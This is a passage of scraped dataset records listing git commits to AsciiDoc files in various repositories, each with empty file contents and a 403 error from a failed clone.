icsearch,s1monw\/elasticsearch,mjason3\/elasticsearch,wbowling\/elasticsearch,markwalkom\/elasticsearch,socialrank\/elasticsearch,shreejay\/elasticsearch,dongjoon-hyun\/elasticsearch,rmuir\/elasticsearch,trangvh\/elasticsearch,sreeramjayan\/elasticsearch,coding0011\/elasticsearch,rhoml\/elasticsearch,martinstuga\/elasticsearch,wangtuo\/elasticsearch,andrejserafim\/elasticsearch,dpursehouse\/elasticsearch,s1monw\/elasticsearch,bawse\/elasticsearch,wenpos\/elasticsearch,cwurm\/elasticsearch,geidies\/elasticsearch,vroyer\/elassandra,cwurm\/elasticsearch,geidies\/elasticsearch,socialrank\/elasticsearch,rmuir\/elasticsearch,trangvh\/elasticsearch,avikurapati\/elasticsearch,glefloch\/elasticsearch,rmuir\/elasticsearch,rhoml\/elasticsearch,spiegela\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,nomoa\/elasticsearch,dongjoon-hyun\/elasticsearch,cwurm\/elasticsearch,gmarz\/elasticsearch,spiegela\/elasticsearch,xuzha\/elasticsearch,bawse\/elasticsearch,MaineC\/elasticsearch,mapr\/elasticsearch,polyfractal\/elasticsearch,avikurapati\/elasticsearch,gmarz\/elasticsearch,henakamaMSFT\/elasticsearch,PhaedrusTheGreek\/elasticsearch,winstonewert\/elasticsearch,mohit\/elasticsearch,snikch\/elasticsearch,dpursehouse\/elasticsearch,gmarz\/elasticsearch,a2lin\/elasticsearch,Helen-Zhao\/elasticsearch,scorpionvicky\/elasticsearch,Stacey-Gammon\/elasticsearch,fforbeck\/elasticsearch,zkidkid\/elasticsearch,jbertouch\/elasticsearch,HonzaKral\/elasticsearch,mikemccand\/elasticsearch,mmaracic\/elasticsearch,rhoml\/elasticsearch,scottsom\/elasticsearch,markharwood\/elasticsearch,ESamir\/elasticsearch,ESamir\/elasticsearch,brandonkearby\/elasticsearch,camilojd\/elasticsearch,LewayneNaidoo\/elasticsearch,nknize\/elasticsearch,kaneshin\/elasticsearch,snikch\/elasticsearch,scorpionvicky\/elasticsearch,jpountz\/elasticsearch,mikemccand\/elasticsearch,davidvgalbraith\/elasticsearch,ESamir\/elasticsearch,obourgain\/elasticsearch,socialrank\/elasticsearch,kaneshin\/elasticsearch,C-Bish\/elasticsearch,strapdata\/elassandra,davidvgalbraith\/elasticsearch,s1monw\/elasticsearch,nazarewk\/elasticsearch,mjason3\/elasticsearch,cwurm\/elasticsearch,C-Bish\/elasticsearch,davidvgalbraith\/elasticsearch,gingerwizard\/elasticsearch,scottsom\/elasticsearch,umeshdangat\/elasticsearch,MaineC\/elasticsearch,avikurapati\/elasticsearch,yynil\/elasticsearch,winstonewert\/elasticsearch,JervyShi\/elasticsearch,ricardocerq\/elasticsearch,scottsom\/elasticsearch,maddin2016\/elasticsearch,palecur\/el
asticsearch,girirajsharma\/elasticsearch,JSCooke\/elasticsearch,alexshadow007\/elasticsearch,nknize\/elasticsearch,xuzha\/elasticsearch,camilojd\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,episerver\/elasticsearch,diendt\/elasticsearch,JackyMai\/elasticsearch,sreeramjayan\/elasticsearch,JSCooke\/elasticsearch,alexshadow007\/elasticsearch,nezirus\/elasticsearch,nomoa\/elasticsearch,JackyMai\/elasticsearch,schonfeld\/elasticsearch,HonzaKral\/elasticsearch,tebriel\/elasticsearch,robin13\/elasticsearch,ZTE-PaaS\/elasticsearch,rajanm\/elasticsearch,wuranbo\/elasticsearch,palecur\/elasticsearch,mohit\/elasticsearch,rhoml\/elasticsearch,kalimatas\/elasticsearch,JSCooke\/elasticsearch,jchampion\/elasticsearch,kalimatas\/elasticsearch,naveenhooda2000\/elasticsearch,brandonkearby\/elasticsearch,mjason3\/elasticsearch,LewayneNaidoo\/elasticsearch,zkidkid\/elasticsearch,liweinan0423\/elasticsearch,qwerty4030\/elasticsearch,obourgain\/elasticsearch,jbertouch\/elasticsearch,clintongormley\/elasticsearch,vroyer\/elasticassandra,episerver\/elasticsearch,vroyer\/elasticassandra,socialrank\/elasticsearch,nezirus\/elasticsearch,drewr\/elasticsearch,bawse\/elasticsearch,rlugojr\/elasticsearch,elasticdog\/elasticsearch,socialrank\/elasticsearch,episerver\/elasticsearch,xuzha\/elasticsearch,henakamaMSFT\/elasticsearch,wbowling\/elasticsearch,rmuir\/elasticsearch,gmarz\/elasticsearch,awislowski\/elasticsearch,fforbeck\/elasticsearch,vroyer\/elasticassandra,diendt\/elasticsearch,schonfeld\/elasticsearch,mikemccand\/elasticsearch,strapdata\/elassandra5-rc,PhaedrusTheGreek\/elasticsearch,uschindler\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,JackyMai\/elasticsearch,IanvsPoplicola\/elasticsearch,mapr\/elasticsearch,yynil\/elasticsearch,IanvsPoplicola\/elasticsearch,drewr\/elasticsearch,winstonewert\/elasticsearch,zkidkid\/elasticsearch,tebriel\/elasticsearch,clintongormley\/elasticsearch,MisterAndersen\/elasticsearch,jpountz\/elasticsearch,ivansun1010\/elasticsearch,camilojd\/elasticsearch,jbertouch\/elasticsearch,wbowling\/elasticsearch,umeshdangat\/elasticsearch,clintongormley\/elasticsearch,andrejserafim\/elasticsearch,brandonkearby\/elasticsearch,glefloch\/elasticsearch,alexshadow007\/elasticsearch,rajanm\/elasticsearch,dpursehouse\/elasticsearch,LeoYao\/elasticsearch,nazarewk\/elasticsearch,nezirus\/elasticsearch,dongjoon-hyun\/elasticsearch,gingerwizard\/elasticsearch,ZTE-PaaS\/elasticsearch,vroyer\/elassandra,Shepard1212\/elasticsearch,markharwood\/elasticsearch,scottsom\/elasticsearch,ricardocerq\/elasticsearch,s1monw\/elasticsearch,snikch\/elasticsearch,JervyShi\/elasticsearch,andrejserafim\/elasticsearch,umeshdangat\/elasticsearch,drewr\/elasticsearch,wenpos\/elasticsearch,lks21c\/elasticsearch,rajanm\/elasticsearch,diendt\/elasticsearch,rajanm\/elasticsearch,MaineC\/elasticsearch,strapdata\/elassandra5-rc,wuranbo\/elasticsearch,fforbeck\/elasticsearch,camilojd\/elasticsearch,rajanm\/elasticsearch,Helen-Zhao\/elasticsearch,trangvh\/elasticsearch,gfyoung\/elasticsearch,winstonewert\/elasticsearch,drewr\/elasticsearch,jpountz\/elasticsearch,drewr\/elasticsearch,rlugojr\/elasticsearch,i-am-Nathan\/elasticsearch,artnowo\/elasticsearch,jimczi\/elasticsearch,obourgain\/elasticsearch,uschindler\/elasticsearch,njlawton\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,bawse\/elasticsearch,LeoYao\/elasticsearch,PhaedrusTheGreek\/elasticsearch,awislowski\/elasticsearch,sneivandt\/elasticsearch,njlawton\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasti
csearch,polyfractal\/elasticsearch,MisterAndersen\/elasticsearch,mmaracic\/elasticsearch,naveenhooda2000\/elasticsearch,dpursehouse\/elasticsearch,gfyoung\/elasticsearch,jpountz\/elasticsearch,ivansun1010\/elasticsearch,gmarz\/elasticsearch,trangvh\/elasticsearch,nazarewk\/elasticsearch,markwalkom\/elasticsearch,martinstuga\/elasticsearch,myelin\/elasticsearch,artnowo\/elasticsearch,sneivandt\/elasticsearch,Stacey-Gammon\/elasticsearch,pozhidaevak\/elasticsearch,qwerty4030\/elasticsearch,strapdata\/elassandra,AndreKR\/elasticsearch,mapr\/elasticsearch,mortonsykes\/elasticsearch,F0lha\/elasticsearch,shreejay\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,lks21c\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,polyfractal\/elasticsearch,martinstuga\/elasticsearch,zkidkid\/elasticsearch,socialrank\/elasticsearch,markwalkom\/elasticsearch,jimczi\/elasticsearch,glefloch\/elasticsearch,nilabhsagar\/elasticsearch,myelin\/elasticsearch,sneivandt\/elasticsearch,xuzha\/elasticsearch,jpountz\/elasticsearch,mjason3\/elasticsearch,obourgain\/elasticsearch,martinstuga\/elasticsearch,mmaracic\/elasticsearch,wangtuo\/elasticsearch,yynil\/elasticsearch,ESamir\/elasticsearch,tebriel\/elasticsearch,jprante\/elasticsearch,sreeramjayan\/elasticsearch,markharwood\/elasticsearch,wbowling\/elasticsearch,drewr\/elasticsearch,ZTE-PaaS\/elasticsearch,wbowling\/elasticsearch,liweinan0423\/elasticsearch,ivansun1010\/elasticsearch,gfyoung\/elasticsearch,AndreKR\/elasticsearch,palecur\/elasticsearch,diendt\/elasticsearch,pozhidaevak\/elasticsearch,StefanGor\/elasticsearch,JSCooke\/elasticsearch,davidvgalbraith\/elasticsearch,nknize\/elasticsearch,LewayneNaidoo\/elasticsearch,jimczi\/elasticsearch,rmuir\/elasticsearch,mohit\/elasticsearch,kaneshin\/elasticsearch,mortonsykes\/elasticsearch,strapdata\/elassandra5-rc,wuranbo\/elasticsearch,MisterAndersen\/elasticsearch,nilabhsagar\/elasticsearch,ricardocerq\/elasticsearch,MisterAndersen\/elasticsearch,andrejserafim\/elasticsearch,yanjunh\/elasticsearch,episerver\/elasticsearch,maddin2016\/elasticsearch,C-Bish\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JackyMai\/elasticsearch,awislowski\/elasticsearch,nazarewk\/elasticsearch,LewayneNaidoo\/elasticsearch,jprante\/elasticsearch,bawse\/elasticsearch,JackyMai\/elasticsearch,episerver\/elasticsearch,LeoYao\/elasticsearch,kaneshin\/elasticsearch,rmuir\/elasticsearch,nazarewk\/elasticsearch,strapdata\/elassandra5-rc,girirajsharma\/elasticsearch,gingerwizard\/elasticsearch,socialrank\/elasticsearch,jimczi\/elasticsearch,nknize\/elasticsearch,spiegela\/elasticsearch,yanjunh\/elasticsearch,wuranbo\/elasticsearch,gfyoung\/elasticsearch,markharwood\/elasticsearch,henakamaMSFT\/elasticsearch,trangvh\/elasticsearch,snikch\/elasticsearch,Helen-Zhao\/elasticsearch,geidies\/elasticsearch,JervyShi\/elasticsearch,qwerty4030\/elasticsearch,robin13\/elasticsearch,polyfractal\/elasticsearch,schonfeld\/elasticsearch,glefloch\/elasticsearch,scottsom\/elasticsearch,myelin\/elasticsearch,winstonewert\/elasticsearch,rlugojr\/elasticsearch,maddin2016\/elasticsearch,alexshadow007\/elasticsearch,rajanm\/elasticsearch,rlugojr\/elasticsearch,IanvsPoplicola\/elasticsearch,andrejserafim\/elasticsearch,nomoa\/elasticsearch,nezirus\/elasticsearch,i-am-Nathan\/elasticsearch,ivansun1010\/elasticsearch,fred84\/elasticsearch,geidies\/elasticsearch,StefanGor\/elasticsearch,dpursehouse\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wbowling\/elasticsearch,geidies\/elasticsearch,wenpos\/elasticsearch,myelin\/elasticsearch,i-
am-Nathan\/elasticsearch,kalimatas\/elasticsearch,JSCooke\/elasticsearch,zkidkid\/elasticsearch,GlenRSmith\/elasticsearch,LewayneNaidoo\/elasticsearch,alexshadow007\/elasticsearch,schonfeld\/elasticsearch,fforbeck\/elasticsearch,palecur\/elasticsearch,vroyer\/elassandra,rhoml\/elasticsearch,nezirus\/elasticsearch,GlenRSmith\/elasticsearch,rlugojr\/elasticsearch,liweinan0423\/elasticsearch,masaruh\/elasticsearch,uschindler\/elasticsearch,lks21c\/elasticsearch,jchampion\/elasticsearch,uschindler\/elasticsearch,mmaracic\/elasticsearch,yynil\/elasticsearch,StefanGor\/elasticsearch,elasticdog\/elasticsearch,polyfractal\/elasticsearch,jprante\/elasticsearch,PhaedrusTheGreek\/elasticsearch,ricardocerq\/elasticsearch,ESamir\/elasticsearch,njlawton\/elasticsearch,mmaracic\/elasticsearch,martinstuga\/elasticsearch,fred84\/elasticsearch,girirajsharma\/elasticsearch,F0lha\/elasticsearch,kalimatas\/elasticsearch,strapdata\/elassandra,nomoa\/elasticsearch,martinstuga\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,PhaedrusTheGreek\/elasticsearch,geidies\/elasticsearch,masaruh\/elasticsearch,wangtuo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,s1monw\/elasticsearch,Shepard1212\/elasticsearch,AndreKR\/elasticsearch,mapr\/elasticsearch,ivansun1010\/elasticsearch,StefanGor\/elasticsearch,artnowo\/elasticsearch,masaruh\/elasticsearch,strapdata\/elassandra,girirajsharma\/elasticsearch","old_file":"TESTING.asciidoc","new_file":"TESTING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"70af2722cd52d0a2aac5b7f3d9e390aafc2c8241","subject":"Added test about file.","message":"Added test about file.","repos":"rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io","old_file":"about\/about.adoc","new_file":"about\/about.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rage5474\/rage5474.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"254094d10ee6f3fb9edd47b78c385d47d5c04d21","subject":"Update 2014-10-03-Episode-12-The-Extraordinarily-Awkward-Pause.adoc","message":"Update 2014-10-03-Episode-12-The-Extraordinarily-Awkward-Pause.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2014-10-03-Episode-12-The-Extraordinarily-Awkward-Pause.adoc","new_file":"_posts\/2014-10-03-Episode-12-The-Extraordinarily-Awkward-Pause.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70cdabdae8a55e03ca2cf567598c5d31ae161404","subject":"Update 2015-09-02-Calculating-area-of-objects-visible-in-frame.adoc","message":"Update 2015-09-02-Calculating-area-of-objects-visible-in-frame.adoc","repos":"xmichaelx\/xmichaelx.github.io,xmichaelx\/xmichaelx.github.io","old_file":"_posts\/2015-09-02-Calculating-area-of-objects-visible-in-frame.adoc","new_file":"_posts\/2015-09-02-Calculating-area-of-objects-visible-in-frame.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/xmichaelx\/xmichaelx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68fc84ad3f2a8f236cfe45a4ed6e93c1172bce87","subject":"Update 2016-03-22-FastPass-no-longer-offered-for-Magic-Kingdom-parades-and-fireworks.adoc","message":"Update 2016-03-22-FastPass-no-longer-offered-for-Magic-Kingdom-parades-and-fireworks.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-22-FastPass-no-longer-offered-for-Magic-Kingdom-parades-and-fireworks.adoc","new_file":"_posts\/2016-03-22-FastPass-no-longer-offered-for-Magic-Kingdom-parades-and-fireworks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f5212f19fcd6ed54811cb7bde463db21ed794325","subject":"Publish 2016-6-26-first-title.adoc","message":"Publish 2016-6-26-first-title.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-first-title.adoc","new_file":"2016-6-26-first-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c03ec77e0e046be10300c7fb6f69d5f6114be51","subject":"Update 2016-06-05-Testing-feign-clients.adoc","message":"Update 2016-06-05-Testing-feign-clients.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2016-06-05-Testing-feign-clients.adoc","new_file":"_posts\/2016-06-05-Testing-feign-clients.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eeabb094175187b3831bafa25a55cceec60a73bb","subject":"ReleaseNotesDummy Adding dummy release notes file to repo","message":"ReleaseNotesDummy Adding dummy release notes file to repo\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"virt\/virt-4-8-release-notes.adoc","new_file":"virt\/virt-4-8-release-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0696d958c172ae7d054ae9c0798842f2effb4c4d","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"4faae2e5a2ecc5c4cdd27ad934b40d9a77935941","subject":"Update 2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","message":"Update 2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","new_file":"_posts\/2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7394b1573c04e0ba5c451c5f2162c179d205c36c","subject":"Update 2017-09-24-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-24-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-24-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-24-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09fb50224bfbecea539ddbdf960f6037255a4333","subject":"relnotes: Prepare for Kudu 1.6 release","message":"relnotes: Prepare for Kudu 1.6 release\n\nThis patch simply removes the release notes for Kudu 1.5.0 and puts in\nplaceholders for Kudu 1.6.0.\n\nChange-Id: I582abbf99deda2928db79c4c90ba638993f2151c\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8632\nTested-by: Kudu Jenkins\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"85a76ef9dd7d4142d7d9f36848f9dde644d333df","subject":"Update 2015-05-14-test.adoc","message":"Update 2015-05-14-test.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-test.adoc","new_file":"_posts\/2015-05-14-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b191479ed10dc51d05da96c0b30fabc88601733","subject":"draft deref for 06\/23","message":"draft deref for 
06\/23\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/07\/23\/deref.adoc","new_file":"content\/news\/2021\/07\/23\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"eba6ce692f470cbb0ebaf28103b3f1780ea1993c","subject":"Update 2015-06-15-WFH-culture-and-the-virtual-office-of-science.adoc","message":"Update 2015-06-15-WFH-culture-and-the-virtual-office-of-science.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-06-15-WFH-culture-and-the-virtual-office-of-science.adoc","new_file":"_posts\/2015-06-15-WFH-culture-and-the-virtual-office-of-science.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4c00e2d6ab6249299d8690d72024ebff8a11719","subject":"Update 2015-10-13-Episode-25-Teeny-Tiny-Isnt-Always-a-Bad-Thing.adoc","message":"Update 2015-10-13-Episode-25-Teeny-Tiny-Isnt-Always-a-Bad-Thing.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-10-13-Episode-25-Teeny-Tiny-Isnt-Always-a-Bad-Thing.adoc","new_file":"_posts\/2015-10-13-Episode-25-Teeny-Tiny-Isnt-Always-a-Bad-Thing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f36d495c812f053eb5637235e70672204da5c307","subject":"Initial docs describing lift's DI","message":"Initial docs describing lift's DI\n","repos":"lift\/framework,lift\/framework,lift\/framework,lift\/framework","old_file":"docs\/dependency-injection-liftweb-scala.adoc","new_file":"docs\/dependency-injection-liftweb-scala.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lift\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b7360a803d49769da00328ec89b2f089bf907e43","subject":"SEC-3152: Add @Retention to @WithMock documentation","message":"SEC-3152: Add @Retention to @WithMock 
documentation\n","repos":"rwinch\/spring-security,SanjayUser\/SpringSecurityPro,rwinch\/spring-security,jgrandja\/spring-security,kazuki43zoo\/spring-security,SanjayUser\/SpringSecurityPro,eddumelendez\/spring-security,spring-projects\/spring-security,panchenko\/spring-security,panchenko\/spring-security,fhanik\/spring-security,mdeinum\/spring-security,SanjayUser\/SpringSecurityPro,ollie314\/spring-security,ollie314\/spring-security,thomasdarimont\/spring-security,olezhuravlev\/spring-security,spring-projects\/spring-security,eddumelendez\/spring-security,pwheel\/spring-security,djechelon\/spring-security,olezhuravlev\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,thomasdarimont\/spring-security,kazuki43zoo\/spring-security,djechelon\/spring-security,panchenko\/spring-security,rwinch\/spring-security,djechelon\/spring-security,ollie314\/spring-security,spring-projects\/spring-security,wkorando\/spring-security,eddumelendez\/spring-security,pwheel\/spring-security,thomasdarimont\/spring-security,panchenko\/spring-security,olezhuravlev\/spring-security,pwheel\/spring-security,ollie314\/spring-security,rwinch\/spring-security,fhanik\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,mdeinum\/spring-security,mdeinum\/spring-security,djechelon\/spring-security,kazuki43zoo\/spring-security,spring-projects\/spring-security,kazuki43zoo\/spring-security,jgrandja\/spring-security,eddumelendez\/spring-security,SanjayUser\/SpringSecurityPro,fhanik\/spring-security,rwinch\/spring-security,eddumelendez\/spring-security,mdeinum\/spring-security,jgrandja\/spring-security,wkorando\/spring-security,wkorando\/spring-security,olezhuravlev\/spring-security,thomasdarimont\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,kazuki43zoo\/spring-security,olezhuravlev\/spring-security,djechelon\/spring-security,pwheel\/spring-security,thomasdarimont\/spring-security,wkorando\/spring-security,fhanik\/spring-security,SanjayUser\/SpringSecurityPro,fhanik\/spring-security,pwheel\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/test.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhanik\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"65823aec473db0f805c93d552ae42fb81a6c0464","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbded651b308fc67d0ee06db2d4f1b582561b915","subject":"Update 2015-08-23-Daisies-arent-roses.adoc","message":"Update 2015-08-23-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-08-23-Daisies-arent-roses.adoc","new_file":"_posts\/2015-08-23-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5135e3612bbd842f9df832c356372fa5633d5984","subject":"Publish 2016-6-26-PHPER-H5-J-Sase64-base64.adoc","message":"Publish 2016-6-26-PHPER-H5-J-Sase64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHPER-H5-J-Sase64-base64.adoc","new_file":"2016-6-26-PHPER-H5-J-Sase64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2276e2a3393f64a365ece52df96ef3cc443621a1","subject":"job #9680 - CLI import implementation note","message":"job #9680 - CLI import implementation note\n","repos":"leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,